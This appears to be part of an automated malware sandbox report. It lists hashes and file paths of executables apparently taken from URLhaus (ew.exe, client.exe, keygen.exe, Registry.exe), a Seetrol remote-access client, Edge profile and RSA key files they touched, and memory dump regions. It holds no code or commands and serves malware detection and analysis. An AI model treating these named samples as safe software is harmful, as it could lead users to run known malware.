C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kmnzbik1.o2z.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3164-2102-0x0000018378140000-0x0000018378162000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bc20bff934a86acf6898a4986bcceaf9
SHA1 bf54082121ca18c9739de73a50b84f07ab6f0513
SHA256 093cb3ac4446458114d8c8e4e47fe26cc31e32e6ff26b0f1ef0a5c626689aa71
SHA512 519660378b15bc02fdc274a8ab811a45b9e52b70254485c20cc9e275639aee90ac4c3ec057a668237bd10400f988a3d1db621508dbcd60bd93dd731ebde8e740

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

memory/4312-2199-0x000001E7F0BA0000-0x000001E7F0BF4000-memory.dmp

memory/4272-2210-0x0000000000400000-0x00000000004CE000-memory.dmp

memory/4272-2215-0x0000024B00360000-0x0000024B00368000-memory.dmp

memory/4272-2244-0x0000024B1A5F0000-0x0000024B1A6FA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\Downloads\UrlHausFiles\ew.exe

MD5 d76e1525c8998795867a17ed33573552
SHA1 daf5b2ffebc86b85e54201100be10fa19f19bf04
SHA256 f4dd44bc19c19056794d29151a5b1bb76afd502388622e24c863a8494af147dd
SHA512 c02e1dcea4dc939bee0ca878792c54ff9be25cf68c0631cba1f15416ab1dabcd16c9bb7ad21af69f940d122b82880b1db79df2264a103463e193f8ae157241dd

memory/4800-4899-0x0000000000400000-0x000000000041C000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\client.exe

MD5 d57c5086ea166bc56e091761a43781ff
SHA1 16b7a96e3c43e82ca962bd94ae1898f796c9cd00
SHA256 dc08aa33da827c3199f3f0345606b97b83bc508239c4c24f02a78d6e996bca09
SHA512 893a1fea55837f2cb7cca1a22ab18795c3fcf91edcdf506c269415b06257d17c8fc426b50a8aa2e4dd34de73cc8fe41711b3276b16499a56714aecd2b98cccda

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c1300146567d69e9343e4bffb9b5d018
SHA1 966f6a7deb9a16ea0f0ab102ee94176b8c864c64
SHA256 869cdb4a4fb16f52178d549b4eaf6b8bdaa32aacb06d638747a420acb3a8997c
SHA512 b0b8bc98dae0a186775365c108bbbe3b770bb64905c6057cba420e2a4e9aa1f6351f187d465cb2162514552f2f391a90a6aa660de3169c0778891f04b09c24f4

memory/8012-6110-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 57c05aca699f10d19fd24db73e576240
SHA1 cac9fbbf45fe21d31352154300d2c9b7411ce943
SHA256 35ee3fcf8ab2bc20e87670936b80ce5d9d89c4491d5ec72de31a48784e932bcb
SHA512 9e4258c72c6d0702c64a3e0b6780b7f1fb19c4d5e928f0287ec5b0e6adfe2040542bca252dc5a4cebd675ddb5d1d1d53701baecb838c592360b9fc9a1e832245

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 f7f61ffb8e1f1e272bdf4d326086e760
SHA1 452117f31370a5585d8615fc42bc31fdbe32a348
SHA256 e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af
SHA512 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f

memory/4272-6328-0x0000024B01BC0000-0x0000024B01C16000-memory.dmp

C:\Program Files (x86)\seetrol\client\SeetrolClient.exe

MD5 c3192af2dff9319b35ec48b6fe23b0ff
SHA1 3713858569b97f4044caf9f2e0f8ad5b6b2ef713
SHA256 aec05f916b60a80379a0ecde59749ec89beaa0d331e67846f172dbdce858f278
SHA512 dea78632c6e7d4b749982765857de3daab0ecd2a92ae38a7497d5bdfa6d56d7b8a2378a3043455b645526f67fcdebeaff09d5799c410b383e50e44fa46acd0cd

memory/5796-6355-0x0000000000400000-0x0000000000727000-memory.dmp

memory/8012-6357-0x0000000000400000-0x000000000041B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

MD5 3bd08acd4079d75290eb1fb0c34ff700
SHA1 84d4d570c228271f14e42bbb96702330cc8c8c2d
SHA256 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8
SHA512 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

memory/6420-6387-0x0000000000400000-0x000000000042B000-memory.dmp

memory/2964-6396-0x0000000000400000-0x000000000066D000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe

MD5 5c71794e0bfd811534ff4117687d26e2
SHA1 f4e616edbd08c817af5f7db69e376b4788f835a5
SHA256 f5740aded1f401665ab8bde43afee5dc0b01aa8aacabe9b8bb61b1ef52134a39
SHA512 a7a489d39d2cabdd15fd23354140c559a93969a7474c57553c78dbb9ebbf045541f42c600d7d4bea54a2a1f1c6537b8027a1f385fde6040f339959862ac2ea54

C:\Users\Admin\AppData\Local\Temp\nssB09F.tmp\ioSpecial.ini

MD5 82e897f156e4c82d548dd708f837f0a2
SHA1 58c05ee7c4a4b2a855858c99744e50220a65c1b6
SHA256 719161d6e20fa3dd95dd290b6eca348c15a686cc7d17c368e7701f5bd2f7e45c
SHA512 05e1d2a0faf3f57371046e6a9a2a10a6aa92cf49ff62c7c5f4e160a458fddc4cbb7b98c139fbcea62688af96e7910271e4575c576bccff3630c3d0632f881a78

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

MD5 6f154cc5f643cc4228adf17d1ff32d42
SHA1 10efef62da024189beb4cd451d3429439729675b
SHA256 bf901de5b54a593b3d90a2bcfdf0a963ba52381f542bf33299bdfcc3b5b2afff
SHA512 050fc8a9a852d87f22296be8fe4067d6fabefc2dec408da3684a0deb31983617e8ba42494d3dbe75207d0810dec7ae1238b17b23ed71668cc099a31e1f6539d1

memory/7820-6496-0x00000000007C0000-0x0000000000AE4000-memory.dmp

memory/3636-6509-0x0000000000400000-0x00000000008BA000-memory.dmp

memory/7980-6511-0x000000001C9F0000-0x000000001CA40000-memory.dmp

memory/7980-6532-0x000000001CB00000-0x000000001CBB2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 d13f5d41f67a0df14853e98df208b3b7
SHA1 ee690d3a174496644b6adc2d59212df297548f21
SHA256 bfc826802caaed41b806a6509b42e7cc055f46f99e0dc78e81f64e6bd0615f8e
SHA512 f90441bf3466d8bfc2fbb406670a85455c08b0f5cab306c66cef64e9c8c81c19f585a2dade720e3946202c6729e20ba03cf38bad8167b2ec3e5dc6c742485395

memory/5796-6563-0x0000000000400000-0x0000000000727000-memory.dmp

memory/6420-6568-0x0000000000400000-0x000000000042B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d2afd93fcb553f22eb199a5cbc5fb70f
SHA1 cf79b779b230eccdce31ce22f8745a2c00d4bbac
SHA256 e4d68c1a2cc7aaadfb03dcd713c8041bbef28dd225f17be8ab7ff64832fab346
SHA512 bfb835571b4d4428711c5777c01918fb0f1f6791a60dfdc41b69439f706092910552405344533a59bf2795f672c3241bc83b78ce8a68d540645d25a472817304

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 7c13e1ef9a7825a781ca4137780f732e
SHA1 480e51fdb6060b7573bffd8064db1c7abaf3bd07
SHA256 f532fa4b25f7a3c90c2c7524324394b1562f5bd3ad2eabcbf632b6c5046108ac
SHA512 557e833baf1f281b77fdb858112b0ea097674fd0a419de298ee1d398cc669d77f3cd7fe58cf491185e0092f257c2f9b39598df976fb4a65d0a5398c749a9d688

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe58d83a.TMP

MD5 6946c194f288b2bf3305e516b8c48f83
SHA1 da72e14366952d95a44146eb32cb19bfecf2c8b7
SHA256 b85dae14f3385d5c0417569b12a70a634b31451bcf73f32017591a230dad5f9c
SHA512 1ebbc2a0172211d63f42db22c39e3e1ebe90454de7bf5b125f9f63921d2bcc551634910b3f4cebb19491785a0d5b0d59f0847a7951d3a632c5836b332273419c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 99fd9a26b574900b8812fdad22c15e33
SHA1 b67a0d80f8a255e2a0fc404933a059b7400ab7b1
SHA256 10cb8296d9b3d4ea62eed7ecf55a70364fe101f266f146a96b2bf6170ef73416
SHA512 b4d6867f7d2da2b6e6cd2176079dff757e1f993cf7eb2b5aeb257932c3cc17a0cbfd1655b6169773088bbfbc503bb9c097daf6ea14c329ce083426ddf3c286fe